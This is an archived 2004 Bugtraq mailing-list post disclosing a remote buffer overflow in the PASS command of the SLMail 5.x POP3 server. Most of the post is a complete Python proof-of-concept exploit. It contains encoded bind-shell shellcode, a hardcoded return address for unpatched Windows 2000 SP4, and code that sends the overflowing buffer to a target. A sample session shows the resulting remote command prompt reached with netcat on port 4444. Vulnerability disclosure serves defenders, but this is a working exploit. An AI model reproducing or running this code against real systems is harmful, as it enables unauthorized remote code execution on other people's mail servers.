SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

From: Jérôme ATHIAS (jerome.athias_at_free.fr)
Date: 11/18/04

  • Next message: Nicolas Robillard: "Zone Labs Ad-Blocking Instability"
    To: <bugtraq@securityfocus.com>
    Date: Thu, 18 Nov 2004 22:19:49 +0100
    
    

    SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

    INTRO:

    SLMail Pro is web-based POP3 and SMTP email server software for MicrosoftT
    Windows 2000 that includes advanced features usually found in
    enterprise-level systems.
    Seattlelab has been providing businesses with an alternative to expensive
    email server software for 10 years. Because of its stability, features, and
    price, SLMail Pro has created a niche in a competitive market, proving there
    is no need to spend a small fortune to implement a secure, full-featured
    email server solution.

    PoC:

    ######################################
    # #
    # SLmail 5.5 POP3 PASS Buffer Overflow #
    # Discovered by : Muts #
    # Coded by : Muts #
    # WWW.WHITEHAT.CO.IL #
    # Plain vanilla stack overflow in the PASS command #
    # #
    ######################################
    # D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
    ######################################
    # D:\Projects\BO>nc -v 192.168.1.167 4444 #
    # localhost.lan [192.168.1.167] 4444 (?) open #
    # Microsoft Windows 2000 [Version 5.00.2195] #
    # (C) Copyright 1985-2000 Microsoft Corp. #
    # C:\Program Files\SLmail\System> #
    ######################################

    import struct
    import socket

    print "\n\n############################"
    print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
    print "\nFound & coded by muts [at] whitehat.co.il"
    print "\nFor Educational Purposes Only!"
    print "\n\n############################"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
    sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
    sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
    sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
    sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
    sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
    sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
    sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
    sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
    sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
    sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
    sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
    sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
    sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
    sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
    sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
    sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
    sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
    sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
    sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
    sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
    sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
    sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
    sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
    sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

    #Tested on Win2k SP4 Unpatched
    # Change ret address if needed
    buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
    try:
            print "\nSending evil buffer..."
            s.connect(('192.168.1.167',110))
            data = s.recv(1024)
            s.send('USER username' +'\r\n')
            data = s.recv(1024)
            s.send('PASS ' + buffer + '\r\n')
            data = s.recv(1024)
            s.close()
            print "\nDone! Try connecting to port 4444 on victim machine."
    except:
            print "Could not connect to POP3!"Regards to muts and WHSupport the Whoppix
    project:http://whoppix.net/


  • Next message: Nicolas Robillard: "Zone Labs Ad-Blocking Instability"

    Relevant Pages

    • SLMail Pro Supervisor Report Center Buffer Overflow (#NISR05022004a)
      ... NGSSoftware Insight Security Research Advisory ... SLMail Pro Supervisor Report Center Buffer Overflow ... SLMail Pro version 2.0.9 and earlier on Windows. ...
      (NT-Bugtraq)
    • SLMail Pro Supervisor Report Center Buffer Overflow (#NISR05022004a)
      ... NGSSoftware Insight Security Research Advisory ... SLMail Pro Supervisor Report Center Buffer Overflow ... SLMail Pro version 2.0.9 and earlier on Windows. ...
      (Bugtraq)
    • Re: how to solve a DNS conflict?
      ... > provided POP3 email for us for which senders to us used addresses like ... Now the ISP has upgraded their email server and we have ... > a conflict because we now have to download our mail by accessing ... > I need to figure out how to tell the DNS that for pop3.company.com, ...
      (microsoft.public.win2000.dns)
    • Re: Migrating from POP3 to IMAP
      ... Emails have, up till now, been retrieved from clients by means ... messages using POP3? ... transferred by POP3 to some email server ...
      (comp.os.linux.misc)
    • Re: pop3 email access
      ... But then how will that connect to the exchange mailboxes ... >your ISP mailserver directly... ... RPC over HTTP or even POP3). ... >> Our email server is at an ISP with a few pop3 ...
      (microsoft.public.windows.server.sbs)